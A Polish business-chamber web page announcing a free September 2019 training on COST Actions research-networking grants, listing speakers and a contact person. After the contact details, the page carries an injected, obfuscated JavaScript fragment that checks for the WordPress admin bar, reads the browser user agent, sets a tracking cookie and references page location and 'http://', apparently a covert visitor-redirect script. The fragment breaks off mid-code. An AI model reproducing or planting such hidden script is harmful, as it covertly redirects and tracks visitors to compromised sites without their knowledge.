Akcje COST – szansa na dofinansowanie koordynacji i networkingu w projektach badawczych! | Północna Izba Gospodarcza w Koszalinie

Akcje COST szansą na dofinansowanie koordynacji i networkingu w projektach badawczych – dowiedz się jak uzyskać grant w ramach Europejskiego Programu Współpracy w Dziedzinie Badań Naukowo-Technicznych.

Serdecznie zapraszamy badaczy, naukowców oraz przedstawicieli firm prowadzących prace badawcze na szkolenie dotyczące najbardziej elastycznych, szybkich i wydajnych mechanizmów wspierania międzynarodowej współpracy badawczej oraz jej koordynacji – Akcji COST. Szkolenie odbędzie się 25 września 2019 w siedzibie Regionalnego Centrum Innowacji i Transferu Technologii ZUT w Szczecinie.

Akcje COST to sieć poświęcona współpracy naukowej, uzupełniająca krajowe fundusze badawcze poprzez finansowanie takich działań jak szkolenia, warsztaty, spotkania, konferencje, krótkoterminowe wyjazdy badawcze oraz działania upowszechniające. Program skierowany jest zarówno do instytucji naukowych, organizacji non-profit, pozarządowych oraz firm.

Na naszym szkoleniu dowiedzą się Państwo jakie możliwości daje uczestnictwo w Akcjach COST oraz w jaki sposób wystartować w konkursie na nową Akcję, dołączyć do trwającej już Akcji, bądź zostać zewnętrznym ekspertem.

Szkolenie poprowadzi Krajowy Koordynator COST z Ministerstwa Nauki i Szkolnictwa Wyższego, Pani Jadwiga Mrozowska. Będziemy też gościć osoby, które mają doświadczenie w uczestnictwie w Akcjach COST. Pani dr Nina Kancewicz – Hoffman z Instytutu Badań Literackich PAN opowie o praktycznych aspektach uczestnictwa w Akcji COST dotyczącej nauk humanistycznych, a p. dr hab. inż. Leszek Chybowski profesor Akademii Morskiej w Szczecinie skupi się na naukach technicznych.

Dzięki dofinansowaniu z Ministerstwa Nauki i Szkolnictwa Wyższego uczestnictwo w szkoleniu jest bezpłatne. Wszystkich chętnych serdecznie zapraszamy do rejestracji, ilość miejsc jest ograniczona.

Wszelkich dodatkowych informacji udzieli p. Michał Grudziński, konsultant ds. programów badawczych, e-mail: michal.grudzinski@zut.edu.pl, tel. 91 449 47 23. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m